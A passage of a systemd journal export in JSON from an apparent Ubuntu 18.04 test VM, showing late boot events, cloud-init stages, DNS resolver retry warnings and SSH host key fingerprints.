"_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Multi-User System.", "UNIT" : "multi-user.target", "INVOCATION_ID" : "8176e1f32136427eaa06e0cafe7e88f0", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819963561" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=349;b=e2b08827b5804427b422c10c84f1567e;m=2b9288d;t=5bd16df7ca7f4;x=dad6cb90a3b3aa08", "__REALTIME_TIMESTAMP" : "1615280819972084", "__MONOTONIC_TIMESTAMP" : "45688973", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Graphical Interface.", "UNIT" : "graphical.target", "INVOCATION_ID" : "7b20e5aea4164961a1a8bc0fe70f2e67", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819969962" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34a;b=e2b08827b5804427b422c10c84f1567e;m=2b94255;t=5bd16df7cc1bc;x=a1e8a6d119c9cf1", "__REALTIME_TIMESTAMP" : "1615280819978684", "__MONOTONIC_TIMESTAMP" : "45695573", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Update UTMP about System Runlevel Changes...", "UNIT" : "systemd-update-utmp-runlevel.service", "INVOCATION_ID" : "8c815e0fd19e40f9bc94a57c9e239dbb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819976442" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34b;b=e2b08827b5804427b422c10c84f1567e;m=2b982e9;t=5bd16df7d0251;x=653948edf2957aa5", "__REALTIME_TIMESTAMP" : "1615280819995217", "__MONOTONIC_TIMESTAMP" : "45712105", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-update-utmp-runlevel.service", "INVOCATION_ID" : "8c815e0fd19e40f9bc94a57c9e239dbb", "MESSAGE" : "Started Update UTMP about System Runlevel Changes.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280819992743" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34c;b=e2b08827b5804427b422c10c84f1567e;m=2d159d0;t=5bd16df94d937;x=6afd60d65973aa91", "__REALTIME_TIMESTAMP" : "1615280821557559", "__MONOTONIC_TIMESTAMP" : "47274448", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_CAP_EFFECTIVE" : "0", "CODE_FILE" : "../src/resolve/resolved-dns-transaction.c", "CODE_LINE" : "981", "CODE_FUNC" : "dns_transaction_process_reply", "MESSAGE" : "Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280821557349" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34d;b=e2b08827b5804427b422c10c84f1567e;m=2d15c93;t=5bd16df94dbfb;x=247ae29ca751753b", "__REALTIME_TIMESTAMP" : "1615280821558267", "__MONOTONIC_TIMESTAMP" : "47275155", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_CAP_EFFECTIVE" : "0", "CODE_FILE" : "../src/resolve/resolved-dns-transaction.c", "CODE_LINE" : "981", "CODE_FUNC" : "dns_transaction_process_reply", "MESSAGE" : "Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280821557482" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34e;b=e2b08827b5804427b422c10c84f1567e;m=2d7b806;t=5bd16df9b376e;x=2294cfd776b550f5", "__REALTIME_TIMESTAMP" : "1615280821974894", "__MONOTONIC_TIMESTAMP" : "47691782", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "946d9c088eee49f399e2b8f8748cb430", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'modules:config' at Tue, 09 Mar 2021 09:07:00 +0000. Up 46.18 seconds.", "_PID" : "967", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules --mode=config", "_SYSTEMD_CGROUP" : "/system.slice/cloud-config.service", "_SYSTEMD_UNIT" : "cloud-config.service", "_SYSTEMD_INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34f;b=e2b08827b5804427b422c10c84f1567e;m=2d8b7a5;t=5bd16df9c370d;x=293794bdaf1cd8d8", "__REALTIME_TIMESTAMP" : "1615280822040333", "__MONOTONIC_TIMESTAMP" : "47757221", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-config.service", "INVOCATION_ID" : "f2478185d2b54165b8bd325c095e3331", "MESSAGE" : "Started Apply the settings specified in cloud-config.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822037495" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=350;b=e2b08827b5804427b422c10c84f1567e;m=2d8c1e5;t=5bd16df9c414c;x=1d7ee7480e09a411", "__REALTIME_TIMESTAMP" : "1615280822042956", "__MONOTONIC_TIMESTAMP" : "47759845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Execute cloud user/final scripts...", "UNIT" : "cloud-final.service", "INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822042948" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=351;b=e2b08827b5804427b422c10c84f1567e;m=2e2257e;t=5bd16dfa5a4e2;x=f8cfeef9f82611a5", "__REALTIME_TIMESTAMP" : "1615280822658274", "__MONOTONIC_TIMESTAMP" : "48375166", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "MESSAGE" : "", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822658219" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=352;b=e2b08827b5804427b422c10c84f1567e;m=2e22d66;t=5bd16dfa5acce;x=924240d1c537a496", "__REALTIME_TIMESTAMP" : "1615280822660302", "__MONOTONIC_TIMESTAMP" : "48377190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "#############################################################", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822660295" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=353;b=e2b08827b5804427b422c10c84f1567e;m=2e22e3f;t=5bd16dfa5ada6;x=98532139d824c042", "__REALTIME_TIMESTAMP" : "1615280822660518", "__MONOTONIC_TIMESTAMP" : "48377407", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "-----BEGIN SSH HOST KEY FINGERPRINTS-----", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822660512" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=354;b=e2b08827b5804427b422c10c84f1567e;m=2e23704;t=5bd16dfa5b66c;x=9e6e028ffde5bdfd", "__REALTIME_TIMESTAMP" : "1615280822662764", "__MONOTONIC_TIMESTAMP" : "48379652", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "1024 SHA256:Na+AYIqFXLqoKkXS4zW6wF1+NS6RxOOD/JsWTw2BofU root@test-1 (DSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822662757" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=355;b=e2b08827b5804427b422c10c84f1567e;m=2e24064;t=5bd16dfa5bfcb;x=5d8b087493a3832b", "__REALTIME_TIMESTAMP" : "1615280822665163", "__MONOTONIC_TIMESTAMP" : "48382052", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "256 SHA256:ik8suaV9cNf+I5fd9XYM2qoT9vF08FA3bGdE4oH0qQo root@test-1 (ECDSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822665156" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=356;b=e2b08827b5804427b422c10c84f1567e;m=2e24852;t=5bd16dfa5c7b9;x=24744f5bd495849b", "__REALTIME_TIMESTAMP" : "1615280822667193", "__MONOTONIC_TIMESTAMP" : "48384082", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "256 SHA256:LGSFwDAA7B9jve87IoPLkG3UGaAwTRLkJQeTPTX2mWw root@test-1 (ED25519)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822667186" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=357;b=e2b08827b5804427b422c10c84f1567e;m=2e25165;t=5bd16dfa5d0cc;x=19e81bc8f1dd4d4b", "__REALTIME_TIMESTAMP" : "1615280822669516", "__MONOTONIC_TIMESTAMP" : "48386405", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "2048 SHA256:yknRoTzFSZARXtHupUbaRHJq3cqluJqyPejk+7QaGXg root@test-1 (RSA)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822669509" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=358;b=e2b08827b5804427b422c10c84f1567e;m=2e252a5;t=5bd16dfa5d20c;x=5f885475c0d1e4b3", "__REALTIME_TIMESTAMP" : "1615280822669836", "__MONOTONIC_TIMESTAMP" : "48386725", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "-----END SSH HOST KEY FINGERPRINTS-----", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822669830" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=359;b=e2b08827b5804427b422c10c84f1567e;m=2e25352;t=5bd16dfa5d2ba;x=26ee703de244bf9c", "__REALTIME_TIMESTAMP" : "1615280822670010", "__MONOTONIC_TIMESTAMP" : "48386898", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "_COMM" : "logger", "_EXE" : "/usr/bin/logger", "SYSLOG_IDENTIFIER" : "ec2", "_PID" : "1044", "_CMDLINE" : "logger -p user info -t ec2 -s", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "#############################################################", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822670004" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35a;b=e2b08827b5804427b422c10c84f1567e;m=2e36e2c;t=5bd16dfa6ed93;x=35f1f96d30effd5a", "__REALTIME_TIMESTAMP" : "1615280822742419", "__MONOTONIC_TIMESTAMP" : "48459308", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_STREAM_ID" : "ead4da9ee39d4fce8a904628ddd9478a", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'modules:final' at Tue, 09 Mar 2021 09:07:02 +0000. Up 48.19 seconds.", "_PID" : "1010", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules --mode=final" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35b;b=e2b08827b5804427b422c10c84f1567e;m=2e36e2c;t=5bd16dfa6ed93;x=f45d078408a62683", "__REALTIME_TIMESTAMP" : "1615280822742419", "__MONOTONIC_TIMESTAMP" : "48459308", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-final.service", "_SYSTEMD_UNIT" : "cloud-final.service", "_SYSTEMD_INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "_STREAM_ID" : "ead4da9ee39d4fce8a904628ddd9478a", "_PID" : "1010", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init modules --mode=final", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 finished at Tue, 09 Mar 2021 09:07:02 +0000. Datasource DataSourceOpenStackLocal [net,ver=2]. Up 48.44 seconds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35c;b=e2b08827b5804427b422c10c84f1567e;m=2e469e2;t=5bd16dfa7e94a;x=9a8a1f311ad6278b", "__REALTIME_TIMESTAMP" : "1615280822806858", "__MONOTONIC_TIMESTAMP" : "48523746", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-final.service", "INVOCATION_ID" : "d0aa2ce27cd0496fa1143bc5bdbebf5f", "MESSAGE" : "Started Execute cloud user/final scripts.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822804000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35d;b=e2b08827b5804427b422c10c84f1567e;m=2e476be;t=5bd16dfa7f626;x=3d51e90cf87306f1", "__REALTIME_TIMESTAMP" : "1615280822810150", "__MONOTONIC_TIMESTAMP" : "48527038", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Cloud-init target.", "UNIT" : "cloud-init.target", "INVOCATION_ID" : "12b2c5a5c7674278a29d76d29ab052c1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280822807544" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35e;b=e2b08827b5804427b422c10c84f1567e;m=2e4f15a;t=5bd16dfa870c1;x=ef22149adcde0829", "__REALTIME_TIMESTAMP" : "1615280822841537", "__MONOTONIC_TIMESTAMP" : "48558426", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : 